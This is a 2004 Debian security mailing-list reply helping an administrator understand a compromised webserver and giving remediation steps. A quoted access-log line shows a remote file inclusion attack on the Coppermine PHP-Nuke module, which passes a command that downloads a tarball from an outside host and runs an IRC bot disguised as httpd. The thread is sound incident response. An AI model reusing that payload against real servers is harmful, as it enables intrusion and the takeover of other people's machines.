[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Advice needed, trying to find the vulnerable code on Debian webserver.

On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
> Hi all,
> I did a search in the logs on some of the suspicious users and found a
> match.
> The files that are being downloaded then executed see to be IRC bots.
> http://www.energymech.net/
> Here are some log files.
> - - [18/Jun/2004:22:57:04 +1000] "GET
> /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
> la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
> vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200
> 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

> All those executables in the /tmp dir seem to be all coming from that
> site on our box, definitely the culprit.
> Can someone explain what is going on here ?
> Cause it doesn't make any sense.

  There seems to be some buggy PHP code being used on that site, which 
 is allowing the remote inclusion of  content from the mirabella.net 
 site - this is being abused to run code upon your host.

  You should immediately disable the coppermine PHPNuke module and
 get it patched, upgraded, or replaced.

  Going to securityfocus.com and searching the mailing lists for
 coppermine pulls up multiple hits describing problems - for example
 this post:


  Notice the URLs on section E2?  They match yours..

  See this one for more details too:


  Two things you can do immediately to stop this particular exploit
 are run safe mode for PHP, and firewall off access to mirabella.net.

> What steps should I take now ?

  Remove PHP Nuke, check the logs for other activity, make sure your
 kernel is patched against local root via the recent wholes, and
 look at using a locked down PHP installation - I'm not sure how
 PHPNuke will work with that, but it's gotta be worth a try.

# The Debian Security Audit Project.

Reply to: